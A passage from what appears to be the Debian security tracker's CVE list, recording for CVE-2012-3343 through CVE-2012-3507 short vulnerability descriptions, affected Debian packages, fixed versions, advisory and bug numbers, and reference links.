[squeeze] - roundcube (Vulnerable code not present) NOTE: http://trac.roundcube.net/ticket/1488613 CVE-2012-3507 (Cross-site scripting (XSS) vulnerability in ...) - roundcube (only affects rc versions of 0.8) NOTE: http://trac.roundcube.net/ticket/1488519 CVE-2012-3506 (Unspecified vulnerability in the Apache Open For Business Project (aka ...) NOT-FOR-US: OFBiz CVE-2012-3505 (Tinyproxy 1.8.3 and earlier allows remote attackers to cause a denial ...) {DSA-2564-1} - tinyproxy 1.8.3-3 (bug #685281) NOTE: https://bugs.launchpad.net/ubuntu/+source/tinyproxy/+bug/1036985 CVE-2012-3504 (The nssconfigFound function in genkey.pl in crypto-utils 2.4.1-34 ...) NOT-FOR-US: genkey script from Red Hat, not present in Debian CVE-2012-3503 (The installation script in Katello 1.0 and earlier does not properly ...) NOT-FOR-US: Katello CVE-2012-3502 (The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp ...) - apache2 (Only affects 2.4 from experimental) NOTE: https://issues.apache.org/bugzilla/show_bug.cgi?id=53727 CVE-2012-3501 (The squidclamav_check_preview_handler function in squidclamav.c in ...) - squidclamav (bug #685398) CVE-2012-3500 (scripts/annotate-output.sh in devscripts before 2.12.2, as used in ...) {DSA-2549-1} - devscripts 2.12.2 CVE-2012-3499 (Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP ...) {DSA-2637-1} - apache2 2.2.22-13 (low) CVE-2012-3498 (PHYSDEVOP_map_pirq in Xen 4.1 and 4.2 and Citrix XenServer 6.0.2 and ...) - xen 4.1.3-2 (bug #686764) [squeeze] - xen (Vulnerable code not present) CVE-2012-3497 ((1) TMEMC_SAVE_GET_CLIENT_WEIGHT, (2) TMEMC_SAVE_GET_CLIENT_CAP, (3) ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: TMEM not supported for production systems (technology preview) CVE-2012-3496 (XENMEM_populate_physmap in Xen 4.0, 4.1, and 4.2, and Citrix XenServer ...) {DSA-2544-1} - xen 4.1.3-2 (bug #686764) CVE-2012-3495 (The physdev_get_free_pirq hypercall in arch/x86/physdev.c in Xen 4.1.x ...) - xen 4.1.3-2 (bug #686764) [squeeze] - xen (Vulnerable code not present) CVE-2012-3494 (The set_debugreg hypercall in include/asm-x86/debugreg.h in Xen 4.0, ...) {DSA-2544-1} - xen 4.1.3-2 (bug #686764) CVE-2012-3493 (The command_give_request_ad function in condor_startd.V6/command.cpp ...) - condor 7.8.2~dfsg.1-1+deb7u1 (bug #688210) CVE-2012-3492 (The filesystem authentication (condor_io/condor_auth_fs.cpp) in Condor ...) - condor 7.8.2~dfsg.1-1+deb7u1 (bug #688210) CVE-2012-3491 (src/condor_schedd.V6/schedd.cpp in Condor 7.6.x before 7.6.10 and ...) - condor 7.8.2~dfsg.1-1+deb7u1 (bug #688210) CVE-2012-3490 RESERVED - condor 7.8.2~dfsg.1-1+deb7u1 (bug #688210) CVE-2012-3489 (The xml_parse function in the libxml2 support in the core server ...) {DSA-2534-1} - postgresql-9.1 9.1.5-1 - postgresql-8.4 8.4.12-2 CVE-2012-3488 (The libxslt support in contrib/xml2 in PostgreSQL 8.3 before 8.3.20, ...) {DSA-2534-1} - postgresql-9.1 9.1.5-1 - postgresql-8.4 8.4.12-2 CVE-2012-3487 (Race condition in Tunnelblick 3.3beta20 and earlier allows local users ...) NOT-FOR-US: Tunnelblick CVE-2012-3486 (Tunnelblick 3.3beta20 and earlier allows local users to gain ...) NOT-FOR-US: Tunnelblick CVE-2012-3485 (Tunnelblick 3.3beta20 and earlier relies on argv[0] to determine the ...) NOT-FOR-US: Tunnelblick CVE-2012-3484 (Tunnelblick 3.3beta20 and earlier relies on a test for specific ...) NOT-FOR-US: Tunnelblick CVE-2012-3483 (Race condition in the runScript function in Tunnelblick 3.3beta20 and ...) NOT-FOR-US: Tunnelblick CVE-2012-3482 (Fetchmail 5.0.8 through 6.3.21, when using NTLM authentication in ...) - fetchmail 6.3.22-1 (low) [wheezy] - fetchmail (Minor issue) [squeeze] - fetchmail (Minor issue) CVE-2012-3481 (Integer overflow in the ReadImage function in ...) - gimp 2.8.2-1 (bug #685397) NOTE: http://www.openwall.com/lists/oss-security/2012/08/20/8 NOTE: https://bugzilla.novell.com/show_bug.cgi?id=776572 CVE-2012-3480 (Multiple integer overflows in the (1) strtod, (2) strtof, (3) strtold, ...) - eglibc 2.13-36 (bug #684889) - glibc CVE-2012-3479 (lisp/files.el in Emacs 23.2, 23.3, 23.4, and 24.1 automatically ...) {DSA-2603-1} - emacs23 23.4+1-4 (bug #684695) - emacs24 24.2+1-1 (bug #684694) NOTE: http://www.openwall.com/lists/oss-security/2012/08/13/1 NOTE: http://www.openwall.com/lists/oss-security/2012/08/13/2 CVE-2012-3478 (rssh 2.3.3 and earlier allows local users to bypass intended ...) {DSA-2530-1} - rssh 2.3.3-5 CVE-2012-3477 (SQL injection vulnerability in signup_check.php in NeoInvoice allows ...) NOT-FOR-US: Neoinvoice CVE-2012-3476 (Multiple cross-site scripting (XSS) vulnerabilities in (1) ...) NOT-FOR-US: Ushahidi CVE-2012-3475 (The installer in the Ushahidi Platform before 2.5 omits certain calls ...) NOT-FOR-US: Ushahidi CVE-2012-3474 (The comments API in ...) NOT-FOR-US: Ushahidi CVE-2012-3473 (The (1) reports API and (2) administration feature in the comments API ...) NOT-FOR-US: Ushahidi CVE-2012-3472 (The email API in application/libraries/api/MY_Email_Api_Object.php in ...) NOT-FOR-US: Ushahidi CVE-2012-3471 (Multiple SQL injection vulnerabilities in the edit functions in (1) ...) NOT-FOR-US: Ushahidi CVE-2012-3470 (Multiple SQL injection vulnerabilities in ...) NOT-FOR-US: Ushahidi CVE-2012-3469 (Multiple SQL injection vulnerabilities in the Ushahidi Platform before ...) NOT-FOR-US: Ushahidi CVE-2012-3468 (Multiple SQL injection vulnerabilities in the Ushahidi Platform before ...) NOT-FOR-US: Ushahidi CVE-2012-3467 (Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism ...) - qpid-cpp 0.16-7 (bug #684456) [wheezy] - qpid-cpp 0.16-6+deb7u1 CVE-2012-3466 (GNOME gnome-keyring 3.4.0 through 3.4.1, when gpg-cache-method is set ...) - gnome-keyring 3.4.1-5 (bug #683655) [squeeze] - gnome-keyring (Only affects gnome-keyring 3.4.x) CVE-2012-3465 (Cross-site scripting (XSS) vulnerability in ...) {DSA-2655-1} - rails 2.3.14.1 (low) - ruby-actionpack-3.2 3.2.6-4 (bug #684454) NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2012-3464 (Cross-site scripting (XSS) vulnerability in ...) {DSA-2655-1} - rails 2.3.14.1 (low) - ruby-actionpack-3.2 3.2.6-4 (bug #684454) NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2012-3463 (Cross-site scripting (XSS) vulnerability in ...) - rails (Only affects RoR 3.x) - ruby-actionpack-3.2 3.2.6-4 (bug #684454) NOTE: http://www.openwall.com/lists/oss-security/2012/08/09/8 CVE-2012-3462 RESERVED CVE-2012-3461 (The (1) otrl_base64_otr_decode function in src/b64.c; (2) ...) {DSA-2526-1} - libotr 3.2.1-1 (medium; bug #684121) CVE-2012-3460 RESERVED CVE-2012-3459 (Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, ...) NOT-FOR-US: Cumin CVE-2012-3458 (Beaker before 1.6.4, when using PyCrypto to encrypt sessions, uses AES ...) {DSA-2541-1} - beaker 1.6.3-1.1 (bug #684890) CVE-2012-3457 (PNP4Nagios 0.6 through 0.6.16 uses world-readable permissions for ...) - pnp4nagios (unimportant; bug #683879) NOTE: The permissions of this file are under the control of the admin CVE-2012-3456 (Heap-based buffer overflow in the read function in ...) - calligra 1:2.4.3-2 (bug #684004) - wv2 0.4.2.dfsg.1-9.1 (low) [squeeze] - wv2 (Minor issue) CVE-2012-3455 (Heap-based buffer overflow in the read function in ...) - koffice CVE-2012-3454 (eXtplorer 2.1.0b6 uses world writable permissions for the ...) - extplorer 2.1.0b6+dfsg.3-4 (low; bug #683649) [squeeze] - extplorer (Minor issue) CVE-2012-3453 (logol 1.5.0 uses world writable permissions for the ...) - logol 1.5.0-4 (bug #683647) CVE-2012-3452 (gnome-screensaver 3.4.x before 3.4.4 and 3.5.x before 3.5.4, when ...) - gnome-screensaver (vulnerable code not present) CVE-2012-3451 (Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 ...) NOT-FOR-US: Apache CXF CVE-2012-3450 (pdo_sql_parser.re in the PDO extension in PHP before 5.3.14 and 5.4.x ...) {DSA-2527-1} - php5 5.4.4-1 (bug #683694) NOTE: http://seclists.org/bugtraq/2012/Jun/60 NOTE: https://bugs.php.net/bug.php?id=61755 NOTE: http://www.openwall.com/lists/oss-security/2012/08/02/3 NOTE: http://www.openwall.com/lists/oss-security/2012/08/02/7 CVE-2012-3449 (Open vSwitch 1.4.2 uses world writable permissions for (1) ...) - openvswitch 1.4.2+git20120612-8 (bug #683665) CVE-2012-3448 (Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote ...) {DSA-2610-1} - ganglia 3.3.8-1 (bug #683584) CVE-2012-3447 (virt/disk/api.py in OpenStack Compute (Nova) 2012.1.x before 2012.1.2 ...) - nova 2012.1.1-6 (bug #684256) CVE-2012-3446 (Apache Libcloud before 0.11.1 uses an incorrect regular expression ...) - libcloud 0.5.0-1.1 (bug #683927) CVE-2012-3445 (The virTypedParameterArrayClear function in libvirt 0.9.13 does not ...) - libvirt 0.9.12-4 (bug #683483) [squeeze] - libvirt (Vulnerable code not present) NOTE: https://www.redhat.com/archives/libvir-list/2012-July/msg01650.html NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=844734 CVE-2012-3444 (The get_image_dimensions function in the image-handling functionality ...) {DSA-2529-1} - python-django 1.4.1-1 (bug #683364) NOTE: https://www.djangoproject.com/weblog/2012/jul/30/security-releases-issued/ NOTE: http://www.openwall.com/lists/oss-security/2012/07/31/1 NOTE: http://www.openwall.com/lists/oss-security/2012/07/31/2 CVE-2012-3443 (The django.forms.ImageField class in the form system in Django before ...) {DSA-2529-1} - python-django 1.4.1-1 (bug #683364) NOTE: https://www.djangoproject.com/weblog/2012/jul/30/security-releases-issued/ NOTE: http://www.openwall.com/lists/oss-security/2012/07/31/1 NOTE: http://www.openwall.com/lists/oss-security/2012/07/31/2 CVE-2012-3442 (The (1) django.http.HttpResponseRedirect and (2) ...) {DSA-2529-1} - python-django 1.4.1-1 (bug #683364) NOTE: https://www.djangoproject.com/weblog/2012/jul/30/security-releases-issued/ NOTE: http://www.openwall.com/lists/oss-security/2012/07/31/1 NOTE: http://www.openwall.com/lists/oss-security/2012/07/31/2 CVE-2012-3441 (The database creation script ...) - icinga (Debian uses dbconfig, which does the right thing, bug #683320) CVE-2012-3440 (A certain Red Hat script for sudo 1.7.2 on Red Hat Enterprise Linux ...) - sudo (Red Hat-specific postinst script) CVE-2012-3439 REJECTED CVE-2012-3438 (The Magick_png_malloc function in coders/png.c in GraphicsMagick ...) - graphicsmagick 1.3.16-1.1 (low; bug #683284) [squeeze] - graphicsmagick (Minor issue) CVE-2012-3437 (The Magick_png_malloc function in coders/png.c in ImageMagick 6.7.8-6 ...) - imagemagick 8:6.7.7.10-3 (low; bug #683285) [squeeze] - imagemagick (Minor issue) CVE-2012-3436 (OpenTTD 0.6.0 through 1.2.1 does not properly validate requests to ...) {DSA-2524-1} - openttd 1.2.1-2 (low; bug #683258) CVE-2012-3435 (SQL injection vulnerability in frontends/php/popup_bitem.php in Zabbix ...) {DSA-2539-1} - zabbix 1:2.0.2+dfsg-1 (bug #683273) NOTE: http://seclists.org/oss-sec/2012/q3/127 CVE-2012-3434 (Multiple cross-site scripting (XSS) vulnerabilities in userperspan.php ...) NOT-FOR-US: WordPress plugin Count Per Day CVE-2012-3433 (Xen 4.0 and 4.1 allows local HVM guest OS kernels to cause a denial of ...) {DSA-2531-1} - xen 4.1.3-1 (bug #683279) CVE-2012-3432 (The handle_mmio function in arch/x86/hvm/io.c in the MMIO operations ...) {DSA-2531-1} - xen 4.1.3-1 (bug #683279) CVE-2012-3431 (The Teiid Java Database Connectivity (JDBC) socket, as used in JBoss ...) NOT-FOR-US: Teeid CVE-2012-3430 (The rds_recvmsg function in net/rds/recv.c in the Linux kernel before ...) - linux 3.2.29-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-36 NOTE: http://www.openwall.com/lists/oss-security/2012/07/26/3 CVE-2012-3429 (The dns_to_ldap_dn_escape function in src/ldap_convert.c in ...) NOT-FOR-US: Dynamic LDAP backend plugin for BIND CVE-2012-3428 (The IronJacamar container before 1.0.12.Final for JBoss Application ...) - jbossas4 (Only builds a few libraries, not the full application server) CVE-2012-3427 RESERVED - jbossas4 (Only builds a few libraries, not the full application server) CVE-2012-3426 (OpenStack Keystone before 2012.1.1, as used in OpenStack Folsom before ...) - keystone 2012.1.1-1 CVE-2012-3425 (The png_push_read_zTXt function in pngpread.c in libpng 1.0.x before ...) - libpng 1.2.49-1 (low; bug #668082) [squeeze] - libpng (Minor issue) CVE-2012-3424 (The decode_credentials method in ...) - rails (Only affects RoR 3.x) - ruby-actionpack-3.2 3.2.6-3 (bug #683370) CVE-2012-3423 (The IcedTea-Web plugin before 1.2.1 does not properly handle NPVariant ...) - icedtea-web 1.3-1 CVE-2012-3422 (The getFirstInTableInstance function in the IcedTea-Web plugin before ...) - icedtea-web 1.3-1 CVE-2012-3421 (The pduread function in pdu.c in libpcp in Performance Co-Pilot (PCP) ...) {DSA-2533-1} - pcp 3.6.5 (bug #685476) CVE-2012-3420 (Multiple memory leaks in Performance Co-Pilot (PCP) before 3.6.5 allow ...) {DSA-2533-1} - pcp 3.6.5 (bug #685476) CVE-2012-3419 (Performance Co-Pilot (PCP) before 3.6.5 exports some of the /proc file ...) {DSA-2533-1} - pcp 3.6.5 (bug #685476) CVE-2012-3418 (libpcp in Performance Co-Pilot (PCP) before 3.6.5 allows remote ...) {DSA-2533-1} - pcp 3.6.5 (bug #685476) CVE-2012-3417 (The good_client function in rquotad (rquota_svc.c) in Linux DiskQuota ...) - quota 4.00~pre1-1 NOTE: this is at least fixed in 4.00, I could not trace this back to an exact version CVE-2012-3416 (Condor before 7.8.2 allows remote attackers to bypass host-based ...) - condor 7.8.2~dfsg.1-1 (bug #685366) CVE-2012-3415 RESERVED - plpupload (bug #668396) - wordpress 3.3.2 CVE-2012-3414 [libjs-swfupload, wordpress: XSS vulnerability] RESERVED - libjs-swfupload 2.2.0.1+ds1-2 (low; bug #681323) - wordpress 3.5.1+dfsg-1 (bug #698934) NOTE: https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/ CVE-2012-3413 (The HTMLQuoteColorer::process function in ...) - kdepim (Only affects kdepim >= 4.6) NOTE: CVE-request http://www.openwall.com/lists/oss-security/2012/07/13/3 NOTE: https://projects.kde.org/projects/kde/kdepim/repository/revisions/dbb2f72f4745e00f53031965a9c10b2d6862bd54 NOTE: https://bugs.launchpad.net/ubuntu/+source/kdepim/+bug/1022690 CVE-2012-3412 (The sfc (aka Solarflare Solarstorm) driver in the Linux kernel before ...) - linux 3.2.29-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-36 CVE-2012-3411 (Dnsmasq before 2.63test1, when used with certain libvirt ...) - dnsmasq 2.63-1 (low; bug #683372) [wheezy] - dnsmasq (Minor issue) [squeeze] - dnsmasq (Minor issue) NOTE: Please see CVE-2013-0198 CVE-2012-3410 (Stack-based buffer overflow in lib/sh/eaccess.c in GNU Bash before 4.2 ...) - bash 4.2-4 (low; bug #681278) [squeeze] - bash (Minor issue) CVE-2012-3409 RESERVED - ecryptfs-utils 99-1 (bug #682220) [squeeze] - ecryptfs-utils (home src/dest mountpoints hardcoded in that version) CVE-2012-3408 (lib/puppet/network/authstore.rb in Puppet before 2.7.18, and Puppet ...) - puppet 2.7.18-1 (low) [squeeze] - puppet (Minor issue) NOTE: http://puppetlabs.com/security/cve/cve-2012-3408/ NOTE: There's no code fix, but this should be addressed in stable with a NEWS file warning about this NOTE: Fixed in 2.7.18 by updated docs CVE-2012-3407 RESERVED NOT-FOR-US: plow NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/6 NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/16 CVE-2012-3406 [glibc formatted printing vulnerabilities] RESERVED - eglibc (low; bug #681888) [squeeze] - eglibc (Minor issue) [wheezy] - eglibc (Minor issue) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=826943 NOTE: https://bugzilla.redhat.com/attachment.cgi?id=594722&action=diff NOTE: https://bugzilla.redhat.com/attachment.cgi?id=594727&action=diff NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/5 NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/17 CVE-2012-3405 [glibc formatted printing vulnerabilities] RESERVED - eglibc 2.13-35 (low; bug #681473) NOTE: http://sourceware.org/bugzilla/show_bug.cgi?id=13446 NOTE: http://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a4647e727a2a52e1259474c13f4b13288938bed4 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=833704 NOTE: http://sourceware.org/git/?p=glibc.git;a=commitdiff;h=1d498daa95384e5c9ad5bcb35e7a996e5869ac39 NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/5 NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/17 CVE-2012-3404 [glibc formatted printing vulnerabilities] RESERVED - eglibc 2.13-35 (low; bug #681473) NOTE: http://sourceware.org/bugzilla/show_bug.cgi?id=12445 NOTE: http://sourceware.org/git/?p=glibc.git;a=commitdiff;h=84a4211850e3d23a9d3a4f3b294752a3b30bc0ff NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=833703 NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/5 NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/17 CVE-2012-3403 (Heap-based buffer overflow in the KiSS CEL file format plug-in in GIMP ...) - gimp 2.8.2-1 (bug #685397) CVE-2012-3402 (Integer overflow in plug-ins/common/psd.c in the Adobe Photoshop PSD ...) - gimp 2.4.0~rc1-1 NOTE: Only affects 2.2 series CVE-2012-3401 (The t2p_read_tiff_init function in tiff2pdf (tools/tiff2pdf.c) in ...) {DSA-2552-1} - tiff 4.0.2-2 (bug #682115) - tiff3 3.9.6-7 (bug #682195) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=837577 CVE-2012-3400 (Heap-based buffer overflow in the udf_load_logicalvol function in ...) - linux 3.2.23-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-36 CVE-2012-3399 (Config/diff.php in Basilic 1.5.14 allows remote attackers to execute ...) NOT-FOR-US: Basilic CVE-2012-3398 (Algorithmic complexity vulnerability in Moodle 1.9.x before 1.9.19, ...) - moodle 2.2.3.dfsg-1 (bug #682203) [squeeze] - moodle (Minor issue) CVE-2012-3397 (lib/modinfolib.php in Moodle 2.0.x before 2.0.10, 2.1.x before 2.1.7, ...) - moodle 2.2.3.dfsg-2.1 (bug #682203) [squeeze] - moodle (Only affects >= 2.0) CVE-2012-3396 (Cross-site scripting (XSS) vulnerability in cohort/edit_form.php in ...) - moodle 2.2.3.dfsg-2.1 (bug #682203) [squeeze] - moodle (Only affects >= 2.0) CVE-2012-3395 (SQL injection vulnerability in mod/feedback/complete.php in Moodle ...) - moodle 2.2.3.dfsg-2.1 (bug #682203) [squeeze] - moodle (Only affects >= 2.0) CVE-2012-3394 (auth/ldap/ntlmsso_attempt.php in Moodle 2.0.x before 2.0.10, 2.1.x ...) - moodle 2.2.3.dfsg-2.1 (bug #682203) [squeeze] - moodle (Only affects >= 2.1) CVE-2012-3393 (Cross-site scripting (XSS) vulnerability in repository/lib.php in ...) - moodle 2.2.3.dfsg-2.1 (bug #682203) [squeeze] - moodle (Only affects >= 2.1) CVE-2012-3392 (mod/forum/unsubscribeall.php in Moodle 2.1.x before 2.1.7 and 2.2.x ...) - moodle 2.2.3.dfsg-1 (bug #682203) [squeeze] - moodle (Only affects >= 2.1) CVE-2012-3391 (mod/forum/rsslib.php in Moodle 2.1.x before 2.1.7 and 2.2.x before ...) - moodle 2.2.3.dfsg-1 (bug #682203) [squeeze] - moodle (Only affects >= 2.1) CVE-2012-3390 (lib/filelib.php in Moodle 2.1.x before 2.1.7 and 2.2.x before 2.2.4 ...) - moodle 2.2.3.dfsg-1 (bug #682203) [squeeze] - moodle (Only affects >= 2.1) CVE-2012-3389 (Multiple cross-site scripting (XSS) vulnerabilities in ...) - moodle 2.2.3.dfsg-2.2 (bug #682203) [squeeze] - moodle (Only affects >= 2.2) CVE-2012-3388 (The is_enrolled function in lib/accesslib.php in Moodle 2.2.x before ...) - moodle 2.2.3.dfsg-2.2 (bug #682203) [squeeze] - moodle (Only affects >= 2.2) CVE-2012-3387 (Moodle 2.3.x before 2.3.1 uses only a client-side check for whether ...) - moodle (Only affects 2.3) CVE-2012-3386 (The "make distcheck" rule in GNU Automake before 1.11.6 and 1.12.x ...) - automake 1:1.4-p6-13.1 - automake1.10 1:1.10.3-3 [squeeze] - automake1.10 1:1.10.3-1+squeeze1 - automake1.11 1:1.11.6-1 (bug #681097) [squeeze] - automake1.11 1:1.11.1-1+squeeze1 - automake1.7 1.7.9-10 [squeeze] - automake1.7 1.7.9-9.1+squeeze1 - automake1.9 1.9.6+nogfdl-4 [squeeze] - automake1.9 1.9.6+nogfdl-3.1+squeeze1 CVE-2012-3385 (WordPress before 3.4.1 does not properly restrict access to post ...) - wordpress 3.4.1+dfsg-1 (bug #680721) NOTE: http://www.openwall.com/lists/oss-security/2012/07/02/1 NOTE: http://www.openwall.com/lists/oss-security/2012/07/08/1 CVE-2012-3384 (Cross-site request forgery (CSRF) vulnerability in the customizer in ...) - wordpress 3.4.1+dfsg-1 (bug #680721) NOTE: http://www.openwall.com/lists/oss-security/2012/07/02/1 NOTE: http://www.openwall.com/lists/oss-security/2012/07/08/1 CVE-2012-3383 (The map_meta_cap function in wp-includes/capabilities.php in WordPress ...) - wordpress 3.4.1+dfsg-1 (bug #680721) NOTE: http://www.openwall.com/lists/oss-security/2012/07/02/1 NOTE: http://www.openwall.com/lists/oss-security/2012/07/08/1 CVE-2012-3382 (Cross-site scripting (XSS) vulnerability in the ProcessRequest ...) {DSA-2512-1} - mono 2.10.8.1-5 (bug #681095) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=769799 NOTE: https://github.com/mono/mono/commit/d16d4623edb210635bec3ca3786481b82cde25a2 CVE-2012-3381 (sfcb in sblim-sfcb places a zero-length directory name in the ...) NOT-FOR-US: sblim-sfcb NOTE: https://bugzilla.novell.com/show_bug.cgi?id=770234 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=838160 NOTE: http://www.openwall.com/lists/oss-security/2012/07/06/7 NOTE: http://www.openwall.com/lists/oss-security/2012/07/06/8 CVE-2012-3380 (Directory traversal vulnerability in naxsi-ui/nx_extract.py in the ...) - nginx 1.2.1-2 [squeeze] - nginx (naxsi package was introduced in 1.1.18-1) CVE-2012-3379 [as31: insecure file creation in /tmp] REJECTED CVE-2012-3378 (The register_application function in atk-adaptor/bridge.c in GNOME ...) - at-spi2-atk 2.5.3-1 (bug #678026) CVE-2012-3377 (Heap-based buffer overflow in the Ogg_DecodePacket function in the OGG ...) - vlc 2.0.2-1 (bug #680665) NOTE: http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commitdiff;h=16e9e126333fb7acb47d363366fee3deadc8331e NOTE: http://securitytracker.com/id/1027224 CVE-2012-3376 (DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens ...) - hadoop (bug #535861) NOTE: http://seclists.org/bugtraq/2012/Jul/48 CVE-2012-3375 (The epoll_ctl system call in fs/eventpoll.c in the Linux kernel before ...) - linux 3.2.23-1 - linux-2.6 (Introduced in 3.2) CVE-2012-3374 (Buffer overflow in markup.c in the MXit protocol plugin in libpurple ...) {DSA-2509-1} - pidgin 2.10.6-1 (bug #680661) [squeeze] - pidgin 2.7.3-1+squeeze3 NOTE: http://www.pidgin.im/news/security/index.php?id=64 NOTE: http://hg.pidgin.im/pidgin/main/rev/ded93865ef42 CVE-2012-3373 (Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before ...) NOT-FOR-US: Apache Wicket CVE-2012-3372 (** DISPUTED ** The default configuration of Cyberoam UTM appliances ...) NOT-FOR-US: Cyberoam DPI devices NOTE: https://blog.torproject.org/blog/security-vulnerability-found-cyberoam-dpi-devices-cve-2012-3372 NOTE: http://seclists.org/bugtraq/2012/Jul/20 CVE-2012-3371 (The Nova scheduler in OpenStack Compute (Nova) Folsom (2012.2) and ...) - nova 2012.1.1-5 (bug #681301) NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/13 NOTE: https://github.com/openstack/nova/commit/034762e8060dcf0a11cb039b9d426b0d0bb1801d NOTE: https://github.com/openstack/nova/commit/25f5bd31805bd21d7b7e3583c775252aa8f737e9 NOTE: https://bugs.launchpad.net/nova/+bug/1017795 CVE-2012-3370 (The SecurityAssociation.getCredential method in JBoss Enterprise ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2012-3369 (The CallerIdentityLoginModule in JBoss Enterprise Application Platform ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2012-3368 (Integer signedness error in attach.c in dtach 0.8 allows remote ...) - dtach 0.8-2.1 (low; bug #625302) [squeeze] - dtach 0.8-2+squeeze1 NOTE: http://sourceforge.net/tracker/?func=detail&aid=3517812&group_id=36489&atid=417357 NOTE: http://sourceforge.net/tracker/download.php?group_id=36489&atid=417357&file_id=441195&aid=3517812 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=812551 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=835849 CVE-2012-3367 (Red Hat Certificate System (RHCS) before 8.1.1 and Dogtag Certificate ...) NOT-FOR-US: Red Hat Certificate System CVE-2012-3366 (The Trigger plugin in bcfg2 1.2.x before 1.2.3 allows remote attackers ...) {DSA-2503-1} - bcfg2 1.2.2-2 (bug #679272) CVE-2012-3365 (The SQLite functionality in PHP before 5.3.15 allows remote attackers ...) - php5 (unimportant) NOTE: open_basedir not supported CVE-2012-3364 (Multiple stack-based buffer overflows in the Near Field Communication ...) - linux 3.2.23-1 [squeeze] - linux-2.6 (Vulnerable code not present) CVE-2012-3363 (Zend_XmlRpc in Zend Framework 1.x before 1.11.12 and 1.12.x before ...) {DSA-2505-1} - zendframework 1.11.12-1 (bug #679215) - moodle (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2012-3362 (Cross-site request forgery (CSRF) vulnerability in eXtplorer 2.1 RC3 ...) {DSA-2510-1} - extplorer 2.1.0b6+dfsg.3-3 (bug #678737) CVE-2012-3361 (virt/disk/api.py in OpenStack Compute (Nova) Folsom (2012.2), Essex ...) - nova 2012.1.1-2 (bug #680110) CVE-2012-3360 (Directory traversal vulnerability in virt/disk/api.py in OpenStack ...) - nova 2012.1.1-2 (bug #680110) CVE-2012-3359 RESERVED NOT-FOR-US: Red Hat Conga CVE-2012-3358 (Multiple heap-based buffer overflows in the j2k_read_sot function in ...) {DSA-2629-1} - openjpeg 1.3+dfsg-4.4 (bug #681075) NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/1 NOTE: Upstream patch: http://code.google.com/p/openjpeg/source/detail?r=1727 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=835767 CVE-2012-3357 (The SVN revision view (lib/vclib/svn/svn_repos.py) in ViewVC before ...) {DSA-2563-1} - viewvc 1.1.5-1.3 (bug #679069) NOTE: http://viewvc.tigris.org/issues/show_bug.cgi?id=353 NOTE: http://viewvc.tigris.org/source/browse/viewvc?view=rev&revision=2755 NOTE: http://viewvc.tigris.org/source/browse/viewvc?view=rev&revision=2756 NOTE: http://viewvc.tigris.org/source/browse/viewvc?view=rev&revision=2757 NOTE: http://viewvc.tigris.org/source/browse/viewvc?view=rev&revision=2759 NOTE: http://viewvc.tigris.org/source/browse/viewvc?view=rev&revision=2760 CVE-2012-3356 (The remote SVN views functionality (lib/vclib/svn/svn_ra.py) in ViewVC ...) {DSA-2563-1} - viewvc 1.1.5-1.3 (bug #679069) NOTE: http://viewvc.tigris.org/source/browse/viewvc?view=rev&revision=2758 CVE-2012-3355 ((1) AlbumTab.py, (2) ArtistTab.py, (3) LinksTab.py, and (4) ...) - rhythmbox 2.97-2.1 (low; bug #616673) [squeeze] - rhythmbox (Minor issue) NOTE: Upstream bug report https://bugzilla.gnome.org/show_bug.cgi?id=678661 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=835076 CVE-2012-3354 (doku.php in DokuWiki, as used in Fedora 16, 17, and 18, when certain ...) - dokuwiki (unimportant) NOTE: http://www.openwall.com/lists/oss-security/2012/06/24/2 CVE-2012-3353 RESERVED CVE-2012-3553 (chan_skinny.c in the Skinny (aka SCCP) channel driver in Asterisk Open ...) - asterisk (Only affects Asterisk 10) CVE-2012-3352 RESERVED CVE-2012-3351 RESERVED CVE-2012-3350 (SQL injection vulnerability in index.php in Webmatic 3.1.1 allows ...) NOT-FOR-US: WebMatic NOTE: http://seclists.org/bugtraq/2012/Jul/25 CVE-2012-3349 RESERVED CVE-2012-3348 RESERVED CVE-2012-3347 (AutoFORM PDM Archive before 7.0 implements user accounts in a way that ...) NOT-FOR-US: AutoFORM PDM Archive CVE-2012-3346 RESERVED CVE-2012-3345 (ioquake3 before r2253 allows local users to overwrite arbitrary files ...) - ioquake3 1.36+svn2224-4 NOTE: http://www.openwall.com/lists/oss-security/2012/06/15/3 CVE-2012-3344 RESERVED CVE-2012-3343 (Cross-site request forgery (CSRF) vulnerability 